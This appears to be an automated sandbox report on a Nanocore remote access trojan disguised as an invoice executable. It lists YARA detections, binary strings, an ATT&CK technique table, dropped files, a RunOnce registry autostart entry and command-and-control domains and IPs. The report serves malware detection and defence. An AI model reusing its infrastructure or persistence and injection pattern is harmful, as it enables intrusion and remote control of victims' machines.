        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 3_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        Yara detected Nanocore RAT
        Source: Yara match File source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORY
        Source: Yara match File source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORY
        Source: Yara match File source: Process Memory Space: svchost.exe PID: 4184, type: MEMORY
        Source: Yara match File source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPE
        Source: Yara match File source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPE
        Source: Yara match File source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPE
        Source: Yara match File source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPE
        Source: Yara match File source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPE
        Source: Yara match File source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPE
        Source: Yara match File source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE
        Source: Yara match File source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPE
        Source: Yara match File source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        Detected Nanocore Rat
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: svchost.exe, 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: CasPol.exe, 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: CasPol.exe, 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RAT
        Source: Yara match File source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORY
        Source: Yara match File source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORY
        Source: Yara match File source: Process Memory Space: svchost.exe PID: 4184, type: MEMORY
        Source: Yara match File source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPE
        Source: Yara match File source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPE
        Source: Yara match File source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPE
        Source: Yara match File source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPE
        Source: Yara match File source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPE
        Source: Yara match File source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPE
        Source: Yara match File source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE
        Source: Yara match File source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPE
        Source: Yara match File source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Native API1 | Application Shimming1 | Exploitation for Privilege Escalation1 | Disable or Modify Tools11 | Input Capture11 | File and Directory Discovery1 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Command and Scripting Interpreter1 | Windows Service1 | Application Shimming1 | Deobfuscate/Decode Files or Information11 | LSASS Memory | System Information Discovery13 | Remote Desktop Protocol | Input Capture11 | Exfiltration Over Bluetooth | Encrypted Channel1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | Service Execution2 | Registry Run Keys / Startup Folder11 | Access Token Manipulation1 | Obfuscated Files or Information2 | Security Account Manager | Security Software Discovery321 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Windows Service1 | Software Packing11 | NTDS | Virtualization/Sandbox Evasion14 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software1 | SIM Card Swap | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Process Injection312 | Timestomp1 | LSA Secrets | Process Discovery3 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol2 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Registry Run Keys / Startup Folder11 | Masquerading221 | Cached Domain Credentials | Application Window Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol2 | Jamming or Denial of Service | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion14 | DCSync | Remote System Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection312 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction

        Behavior Graph

        [Behavior graph, rendered as an image in the original report. Graph ID: 358392; Sample: CN-Invoice-XXXXX9808-19011143287994.exe; Startdate: 25/02/2021; Architecture: WINDOWS; Score: 100. Nodes shown: processes (CN-Invoice-XXXXX9808-19011143287994.exe, CasPol.exe, cmd.exe, powershell.exe, conhost.exe, timeout.exe, explorer.exe, svchost.exe, AdvancedRun.exe, WerFault.exe), dropped files (C:\Windows\Microsoft.NET\...\svchost.exe, C:\Users\user\AppData\...\AdvancedRun.exe, C:\Users\user\AppData\Roaming\...\run.dat), DNS/IP nodes (nanopc.linkpc.net 157.97.120.21 port 50005; 185.157.161.86 port 50005; coroloboxorozor.com 172.67.172.17; 192.168.2.1) and the triggered signatures listed in the Signatures section.]

        Screenshots


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        CN-Invoice-XXXXX9808-19011143287994.exe | 30% | Virustotal |
        CN-Invoice-XXXXX9808-19011143287994.exe | 28% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
        CN-Invoice-XXXXX9808-19011143287994.exe | 100% | Joe Sandbox ML |

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe | 3% | Metadefender |
        C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | 3% | Metadefender |
        C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe | 3% | Metadefender |
        C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe | 0% | ReversingLabs |
        C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | 28% | ReversingLabs | ByteCode-MSIL.Trojan.Generic

        Unpacked PE Files

        Source | Detection | Scanner | Label
        13.2.CasPol.exe.51c0000.7.unpack | 100% | Avira | TR/NanoCore.fadte
        13.2.CasPol.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1108376

        Domains

        Source | Detection | Scanner | Label
        coroloboxorozor.com | 15% | Virustotal |

        URLs

        Source | Detection | Scanner | Label
        http://coroloboxorozor.com/base/7A885C86AF3E7CAEF5D9FC154830C30E.html | 0% | Avira URL Cloud | safe
        http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
        http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
        http://coroloboxorozor.com | 0% | Avira URL Cloud | safe
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
        https://go.microd: | 0% | Avira URL Cloud | safe
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
        https://sectigo.com/CPS0C | 0% | URL Reputation | safe
        https://sectigo.com/CPS0D | 0% | URL Reputation | safe
        http://coroloboxorozor.com/base/F5B9A7CB87ADE6C09DC3687F02604706.html | 0% | Avira URL Cloud | safe
        http://coroloboxorozor.com/base/88756E9935B1A5EAEE811D9BDFD69574.html | 0% | Avira URL Cloud | safe
        http://crl.micr | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        nanopc.linkpc.net | 157.97.120.21 | true | false | | high
        coroloboxorozor.com | 172.67.172.17 | true | true | | unknown

          Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        http://coroloboxorozor.com/base/7A885C86AF3E7CAEF5D9FC154830C30E.html | true | Avira URL Cloud: safe | unknown
        http://coroloboxorozor.com/base/F5B9A7CB87ADE6C09DC3687F02604706.html | true | Avira URL Cloud: safe | unknown
        http://coroloboxorozor.com/base/88756E9935B1A5EAEE811D9BDFD69574.html | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

        Name | Source | Malicious | Antivirus Detection | Reputation
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005 | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://ocsp.sectigo.com0 | CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000005.00000002.940071314.000000000501F000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200 | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://coroloboxorozor.com | CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20 | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        https://github.com/Pester/Pester | powershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        https://go.microd: | powershell.exe, 00000001.00000003.748547781.0000000005A2C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000005.00000002.940071314.000000000501F000.00000004.00000001.sdmp | false | | high
        https://sectigo.com/CPS0C | CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        https://sectigo.com/CPS0D | CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://www.nirsoft.net/ | AdvancedRun.exe, AdvancedRun.exe, 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | false | | high
        http://crl.micr | powershell.exe, 00000005.00000003.877512223.0000000009A1C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.938217593.0000000004EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmp | false | | high

                                                Contacted IPs


                                                Public

        IP | Domain | Country | ASN | ASN Name | Malicious
        157.97.120.21 | unknown | Netherlands | 201975 | UNISCAPEBIT-ServicesHostingNL | false
        172.67.172.17 | unknown | United States | 13335 | CLOUDFLARENETUS | true
        185.157.161.86 | unknown | Sweden | 197595 | OBE-EUROPEObenetworkEuropeSE | false

                                                Private

                                                IP
                                                192.168.2.1

                                                General Information

                                                Joe Sandbox Version:31.0.0 Emerald
                                                Analysis ID:358392
                                                Start date:25.02.2021
                                                Start time:15:09:08
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 17m 48s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:CN-Invoice-XXXXX9808-19011143287994.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of new started processes analysed:33
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@50/24@7/4
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 100% (good quality ratio 95.8%)
                                                • Quality average: 83%
                                                • Quality standard deviation: 25.9%
                                                HCA Information:
                                                • Successful, ratio: 93%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                • Exclude process from analysis (whitelisted): WmiPrvSE.exe
                                                • TCP Packets have been reduced to 100
                                                • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 104.42.151.234, 13.88.21.125, 104.43.193.48, 13.64.90.137, 8.248.143.254, 8.248.149.254, 8.248.117.254, 67.27.159.254, 8.253.207.121, 40.88.32.150
                                                • Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
                                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

                                                Time | Type | Description
                                                15:10:11 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbY explorer.exe "C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe"
                                                15:10:20 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbY explorer.exe "C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe"
                                                15:10:35 | API Interceptor | 43x Sleep call for process: powershell.exe modified
                                                15:11:14 | API Interceptor | 1x Sleep call for process: WerFault.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                Match: 172.67.172.17
                                                Associated Sample Name / URL | Detection | Context
                                                RFQ_#2021-2-25-1.pdf.exe | malicious | coroloboxorozor.com/base/099966AA4311D7113F5BB60B93F45E2A.html
                                                PRODUCT SPECIFICATION.exe | malicious | coroloboxorozor.com/base/645C0E3DC93FA95B6C8A8ED7479D7BE0.html
                                                Sample Request for Proposal for Auditing Services.exe | malicious | coroloboxorozor.com/base/047C6EE29B052DE5AEEBC4044252D106.html
                                                DHL_document1102202068090891.exe | malicious | coroloboxorozor.com/base/40146EDED8BA63D6AE3F2DAF99B02171.html
                                                Dekont.pdf.exe | malicious | coroloboxorozor.com/base/543D6276259C453DE82D4E8A6F9C519D.html
                                                order inquiry.exe | malicious | coroloboxorozor.com/base/AE1CA9ADC0D7C9BC87D3746C7E358920.html
                                                IMG_5771098.xlsx | malicious | coroloboxorozor.com/base/F31A591A992F9F10459CA91956D4B922.html
                                                2070121SN-WS.exe | malicious | coroloboxorozor.com/base/D67358B78A0270CCB5939EF8C3384EB0.html
                                                SAL-0908889000.exe | malicious | coroloboxorozor.com/base/707A5EEA0CF5BEFE1A44A93C9F311222.html
